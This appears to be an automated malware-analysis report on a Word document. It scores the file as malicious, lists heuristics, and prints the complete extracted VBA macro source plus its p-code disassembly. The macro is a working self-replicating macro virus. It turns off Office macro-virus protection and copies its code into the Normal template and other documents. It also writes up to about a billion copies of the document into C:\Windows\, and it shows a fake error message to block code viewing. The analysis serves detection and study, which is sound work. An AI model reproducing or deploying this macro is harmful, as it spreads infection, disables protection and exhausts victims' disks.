MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The critical heuristic firing indicates the VBA macro attempts self-replication and disables macro protection, suggesting a malicious intent to spread or evade detection. The Document_Open macro firing further supports the execution of malicious code upon document opening. The macro code itself contains logic for copying its own code to other locations and disabling virus protection, confirming its malicious nature.
Heuristics 3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13935 bytes |
SHA-256: 33808cee32755167bd551cc31c5e4f05bca724dd5c264e55d5ff9c1eb3e78e6a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
On Error GoTo Finm
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
Const exi = "la macro de colombia xxx"
Dim DInfec, planinfec As Boolean
Dim Docu, Plan As Object
Dim modulin, contemodu, Ninfec As String
Dim Nume As Integer
Dim Copform As Object
Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
SaveDoc = ActiveDocument.Saved
Saveplan = NormalTemplate.Saved
DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)
'Ninfec = "'" & " "
Options.VirusProtection = False
Nume = Mid(Int(Rnd() * 10), 1, 1)
Nume = Nume
nume1 = 7
Nume2 = 3
If Nume = nume1 Or Nume = Nume2 Or plainfec = False Then
If DInfec = True And plainfec = False Then
On Error Resume Next
For il = 1 To Plan.CodeModule.CountOfLines
Plan.CodeModule.DeleteLines 1
Next
On Error GoTo Finm
'Docu.CodeModule.addfromstring Ninfec
contemodu = Docu.CodeModule.Lines(1, Docu.CodeModule.CountOfLines)
Plan.CodeModule.AddFromString contemodu
End If
If DInfec = False And plainfec = True Then
On Error Resume Next
For il = 1 To Docu.CodeModule.CountOfLines
Docu.CodeModule.DeleteLines 1
Next
On Error GoTo Finm
'Plan.CodeModule.addfromstring Ninfec
contemodu = Plan.CodeModule.Lines(1, Plan.CodeModule.CountOfLines)
Docu.CodeModule.AddFromString contemodu
End If
If SaveDoc = True Then ThisDocument.Save
If SaveDoc = True And plainfec = False Then NormalTemplate.Save
End If
End If
sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
sd = Trim(sd)
If Year(Now()) >= 2000 And Month(Now()) > 6 Then
ChangeFileOpenDirectory "C:\Windows\"
For i = 1 To 999999991
ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
SaveAsAOCELetter:=False
Next
End If
GoTo Finb
Finm:
On Error Resume Next
For il = 1 To Docu.CodeModule.CountOfLines
Docu.CodeModule.DeleteLines 1
Next
GoTo Finb
Finb:
On Error Resume Next
End Sub
Private Sub Document_New()
End Sub
Private Sub Document_Open()
On Error Resume Next
Const exi = "la macro de colombia xxx"
Dim Docu, Plan As Object
Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
If Docu.CodeModule.CountOfLines > 0 Then
DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
If DInfec = False Then
For il = 1 To Docu.CodeModule.CountOfLines
Docu.CodeModule.DeleteLines 1
Next
End If
End If
Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
If Plan.CodeModule.CountOfLines > 0 Then
plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)
If plainfec = False Then
For il = 1 To Plan.CodeModule.CountOfLines
Plan.CodeModule.DeleteLines 1
Next
End If
End If
End Sub
Private Sub viewvbcode(): MsgBox "The Visual Basic environment could not be initialized. Please run setup to install it correctly.", vbCritical: End Sub ' )(nepo_tnemucod buS etavirP
' Processing file: /opt/analyzer/scan_staging/71ce6a4c3e4242678599c9d4ce403750.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7205 bytes
' Line #0:
' FuncDefn (Private Sub Document_close())
' Line #1:
' Line #2:
' OnError Finm
' Line #3:
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' IfBlock
' Line #4:
' Dim (Const)
' LitStr 0x0018 "la macro de colombia xxx"
' VarDefn exi
' Line #5:
' Dim
' VarDefn DInfec
' VarDefn planinfec (As Boolean)
' Line #6:
' Dim
' VarDefn Docu
' VarDefn Plan (As Object)
' Line #7:
' Dim
' VarDefn modulin
' VarDefn contemodu
' VarDefn Ninfec (As String)
' Line #8:
' Dim
' VarDefn Nume (As Integer)
' Line #9:
' Dim
' VarDefn Copform (As Object)
' Line #10:
' Line #11:
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Docu
' Line #13:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Plan
' Line #14:
' Line #15:
' Ld ActiveDocument
' MemLd Saved
' St SaveDoc
' Line #16:
' Ld NormalTemplate
' MemLd Saved
' St Saveplan
' Line #17:
' Line #18:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Docu
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DInfec
' Line #19:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Plan
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St plainfec
' Line #20:
' Line #21:
' QuoteRem 0x0006 0x0012 "Ninfec = "'" & " ""
' Line #22:
' Line #23:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #24:
' Line #25:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' St Nume
' Line #26:
' Ld Nume
' St Nume
' Line #27:
' LitDI2 0x0007
' St nume1
' Line #28:
' LitDI2 0x0003
' St Nume2
' Line #29:
' Ld Nume
' Ld nume1
' Eq
' Ld Nume
' Ld Nume2
' Eq
' Or
' Ld plainfec
' LitVarSpecial (False)
' Eq
' Or
' IfBlock
' Line #30:
' Ld DInfec
' LitVarSpecial (True)
' Eq
' Ld plainfec
' LitVarSpecial (False)
' Eq
' And
' IfBlock
' Line #31:
' OnError (Resume Next)
' Line #32:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #33:
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #34:
' StartForVariable
' Next
' Line #35:
' OnError Finm
' Line #36:
' QuoteRem 0x000C 0x0024 "Docu.CodeModule.addfromstring Ninfec"
' Line #37:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' Ld Docu
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #38:
' Ld contemodu
' Ld Plan
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #39:
' EndIfBlock
' Line #40:
' Line #41:
' Ld DInfec
' LitVarSpecial (False)
' Eq
' Ld plainfec
' LitVarSpecial (True)
' Eq
' And
' IfBlock
' Line #42:
' OnError (Resume Next)
' Line #43:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #44:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #45:
' StartForVariable
' Next
' Line #46:
' OnError Finm
' Line #47:
' QuoteRem 0x000B 0x0024 "Plan.CodeModule.addfromstring Ninfec"
' Line #48:
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' Ld Plan
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #49:
' Ld contemodu
' Ld Docu
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #50:
' EndIfBlock
' Line #51:
' Line #52:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ThisDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #53:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' Ld plainfec
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #54:
' EndIfBlock
' Line #55:
' EndIfBlock
' Line #56:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' Concat
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' Concat
' St sd
' Line #57:
' Ld sd
' ArgsLd Trim 0x0001
' St sd
' Line #58:
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' LitDI2 0x07D0
' Ge
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0006
' Gt
' And
' IfBlock
' Line #59:
' LitStr 0x000B "C:\Windows\"
' ArgsCall ChangeFileOpenDirectory 0x0001
' Line #60:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI4 0xC9F7 0x3B9A
' For
' Line #61:
' LineCont 0x0010 0F 00 08 00 1B 00 08 00 27 00 08 00 31 00 08 00
' LitStr 0x0002 "AA"
' Ld i
' Concat
' LitStr 0x0006 "AA.DOC"
' Concat
' Paren
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' LitVarSpecial (False)
' ParamNamed LockComments
' LitStr 0x0000 ""
' ParamNamed Password
' LitVarSpecial (True)
' ParamNamed AddToRecentFiles
' LitStr 0x0000 ""
' ParamNamed WritePassword
' LitVarSpecial (False)
' ParamNamed ReadOnlyRecommended
' LitVarSpecial (False)
' ParamNamed EmbedTrueTypeFonts
' LitVarSpecial (False)
' ParamNamed SaveNativePictureFormat
' LitVarSpecial (False)
' ParamNamed SaveFormsData
' LitVarSpecial (False)
' ParamNamed SaveAsAOCELetter
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x000B
' Line #62:
' StartForVariable
' Next
' Line #63:
' EndIfBlock
' Line #64:
' GoTo Finb
' Line #65:
' Line #66:
' Label Finm
' Line #67:
' OnError (Resume Next)
' Line #68:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #69:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #70:
' StartForVariable
' Next
' Line #71:
' GoTo Finb
' Line #72:
' Label Finb
' Line #73:
' OnError (Resume Next)
' Line #74:
' EndSub
' Line #75:
' Line #76:
' FuncDefn (Private Sub Document_New())
' Line #77:
' Line #78:
' EndSub
' Line #79:
' Line #80:
' FuncDefn (Private Sub Document_Open())
' Line #81:
' OnError (Resume Next)
' Line #82:
' Dim (Const)
' LitStr 0x0018 "la macro de colombia xxx"
' VarDefn exi
' Line #83:
' Dim
' VarDefn Docu
' VarDefn Plan (As Object)
' Line #84:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Docu
' Line #85:
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Gt
' IfBlock
' Line #86:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Docu
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DInfec
' Line #87:
' Ld DInfec
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #88:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #89:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #90:
' StartForVariable
' Next
' Line #91:
' EndIfBlock
' Line #92:
' EndIfBlock
' Line #93:
' Line #94:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Plan
' Line #95:
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Gt
' IfBlock
' Line #96:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Plan
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St plainfec
' Line #97:
' Ld plainfec
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #98:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #99:
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #100:
' StartForVariable
' Next
' Line #101:
' EndIfBlock
' Line #102:
' EndIfBlock
' Line #103:
' EndSub
' Line #104:
' FuncDefn (Private Sub viewvbcode())
' BoS 0x0000
' LitStr 0x0060 "The Visual Basic environment could not be initialized. Please run setup to install it correctly."
' Ld vbCritical
' ArgsCall MsgBox 0x0002
' BoS 0x0000
' EndSub
' QuoteRem 0x0099 0x001C " )(nepo_tnemucod buS etavirP"
' Line #105:
' Line #106:
' Line #107:
' Line #108:
' Line #109:
' Line #110:
' Line #111:
' Line #112:
' Line #113:
' Line #114:
' Line #115:
' Line #116:
' Line #117:
' Line #118:
' Line #119:
' Line #120:
' Line #121:
' Line #122:
' Line #123:
' Line #124:
' Line #125:
' Line #126:
' Line #127:
' Line #128:
' Line #129:
' Line #130:
' Line #131:
' Line #132:
' Line #133:
' Line #134:
' Line #135:
' Line #136:
' Line #137:
' Line #138:
' Line #139:
' Line #140:
' Line #141:
' Line #142:
' Line #143:
' Line #144:
' Line #145:
' Line #146:
' Line #147:
' Line #148:
' Line #149:
' Line #150:
' Line #151:
' Line #152:
' Line #153:
' Line #154:
' Line #155:
' Line #156:
' Line #157:
' Line #158:
' Line #159:
' Line #160:
' Line #161:
' Line #162:
' Line #163:
' Line #164:
' Line #165:
' Line #166:
' Line #167:
' Line #168:
' Line #169:
' Line #170:
' Line #171:
' Line #172:
' Line #173:
' Line #174:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.